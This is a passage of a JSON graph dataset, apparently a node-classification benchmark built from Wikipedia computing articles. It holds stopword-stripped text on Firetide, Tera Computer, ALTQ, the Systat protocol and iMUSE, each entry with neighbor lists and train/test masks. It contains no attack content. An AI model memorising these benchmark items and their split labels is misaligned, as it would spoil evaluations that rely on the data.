      2534,
      615,
      7527,
      8678,
      11368,
      6000,
      7541
    ],
    "mask": "Test"
  },
  {
    "node_id": 11696,
    "label": 7,
    "text": "Firetide:firetide firetide american international provider wireless mesh network technology based silicon valley firetide designs sells hardware software wireless networks firetide products used 2000 installations 40 countries firetide provider hardware software wireless infrastructure mesh networks firetide founded 2001 name landmark networks 2003 name changed firetide would better reflect company mission culture one year later considerable investments american investors company moved hawaii los gatos ca firetide inc. currently headquartered campbell ca ca r office bangalore india hotport 7000 series indoor outdoor wireless mesh node equipped dual 802.11n mimo radios radios able operate 2.4 4.9 5.0 ghz allows throughput 400 mbit/s fwb-200 series indoor outdoor wireless point-to-point bridges equipped dual 802.11n mimo radios point-to-point bridges used connect distant wireless networks hotpoint 5000 series indoor outdoor wireless access points equipped dual 802.11n mimo radios access points allow wireless wi-fi network connected mesh software development stopped 2015 hotclient 2000 series indoor outdoor wireless customer premises equipment product extends range wi-fi network thanks powerful radio compared standard consumer laptop radios firetide fwc 2050 wlan controller product control 50 access points ease configuration access points central management controlled web-interface firetide ivs 100 integrated video solution combined ip-camera mesh node hotview pro software centrally manages mesh nodes firetide hardware connected mesh network firetide mobility controller software enables firetide mesh compatible mobile units connecting moving subway train firetide use proprietary automesh routing protocol control data flow mesh 2006 firetide announced going supply technology singapore wireless sg project project goal install nationwide network enable public wi-fi well video voice traffic 2007 firetide installed technology construction site burj khalifa burj dubai construction workers experienced problems communication equipment tower grew taller firetide could provide wireless mesh network voip radios could use allowed coverage walkie-talkies could 2009 firetide got assignment install wireless mesh network seoul metropolitan subway request south korean subway operator live camera coverage came fatal arson 2003 compared competitors firetide one could deliver reliable wireless connection station moving trains systems included cameras train stations trains design aimed avoid fatal accidents distributing real-time video feed train drivers operators command central installation included 1000 mesh nodes well 650 cameras january 2009 firetide installed system california state university long beach may 2010 firetide announced original equipment manufacturer oem agreement netgear license agreement enabled netgear use firetide wlan controller software new portfolio wlan controllers firetide inc. announced acquired unicom systems inc. division unicom global may 19 2014 details acquisition disclosed",
    "neighbors": [
      9098,
      10021,
      10386
    ],
    "mask": "Train"
  },
  {
    "node_id": 11697,
    "label": 3,
    "text": "Tera_Computer_Company:tera computer company tera computer company manufacturer high-performance computing software hardware founded 1987 washington d.c. moved 1988 seattle washington james rottsolk burton smith company first supercomputer product named mta featured interleaved multi-threading i.e barrel processor also data cache relying instead switching threads latency tolerance used deeply pipelined memory system handle many simultaneous requests address randomization avoid memory hot spots upon acquiring cray research division silicon graphics 2000 company renamed cray inc",
    "neighbors": [
      8704,
      10051,
      7432,
      10612,
      731
    ],
    "mask": "Test"
  },
  {
    "node_id": 11698,
    "label": 2,
    "text": "ALTQ:altq altq alternate queueing network scheduler berkeley software distribution altq provides queueing disciplines quality service qos related components required realize resource sharing commonly implemented bsd-based routers altq included base distribution freebsd netbsd dragonfly bsd integrated pf packet filter openbsd later replaced new queueing subsystem deprecated openbsd 5.5 release completely removed 5.6 2014 altq packets assigned queues purpose bandwidth control scheduler defines algorithm used decide packets get delayed dropped sent immediately five schedulers currently supported freebsd implementation altq",
    "neighbors": [
      7425,
      2180,
      1286,
      1927,
      1801,
      10761,
      10000,
      2193,
      274,
      7702,
      9625,
      1946,
      4636,
      9762,
      2212,
      6438,
      8998,
      10535,
      684,
      4908,
      1071,
      3248,
      7983,
      9009,
      11573,
      1718,
      9784,
      1465,
      5177,
      5819,
      5181,
      3006,
      9151,
      11459,
      9671,
      9927,
      1993,
      8266,
      8395,
      3404,
      8909,
      5710,
      6864,
      1361,
      850,
      7249,
      7383,
      10455,
      6361,
      8410,
      4571,
      6491,
      9306,
      607,
      3551,
      7521,
      8546,
      1891,
      7907,
      1637,
      998,
      4073,
      4589,
      2415,
      8816,
      2545,
      3058,
      7027,
      9201,
      2421,
      2294,
      9844,
      2424,
      1273,
      11506,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 11699,
    "label": 5,
    "text": "Systat_(protocol):systat protocol systat active users simple internet protocol ostensibly useful debugging measurement connection port 11 either tcp udp elicits list users currently logged system though remains official internet protocol use considered security vulnerability",
    "neighbors": [
      6993
    ],
    "mask": "None"
  },
  {
    "node_id": 11700,
    "label": 7,
    "text": "IMUSE:imuse imuse interactive music streaming engine interactive music system used number lucasarts video games idea behind imuse synchronize music visual action video game audio continuously matches on-screen events transitions one musical theme another done seamlessly imuse developed early 1990s composers michael land peter mcconnell working lucasarts imuse system patented lucasarts added fifth version scumm game engine 1991. imuse developed michael land frustration audio system used lucasarts composing secret monkey island goal create system would enable composer set mood via music according events game project much daring imagined brought old friend peter mcconnell collaborate creating system later patented together imuse also found useful account differences processing speed personal computers time direct means synchronizing sound gameplay rendering account imuse system acts pit orchestra according mcconnell playing back shorter longer sections music waiting key events occur within game drawing engine first game use imuse system used lucasarts adventure games since also used non-adventure lucasarts titles dos version one often cited example imuse system beginning guybrush finds woodtick small town scabb island whenever guybrush walks building variation woodtick theme plays different instrument guybrush walks music closing flourish leads back basic woodtick theme",
    "neighbors": [
      7586,
      8454,
      2826,
      3210,
      11306,
      2293,
      4182,
      5914,
      5083,
      1916
    ],
    "mask": "Train"
  }
]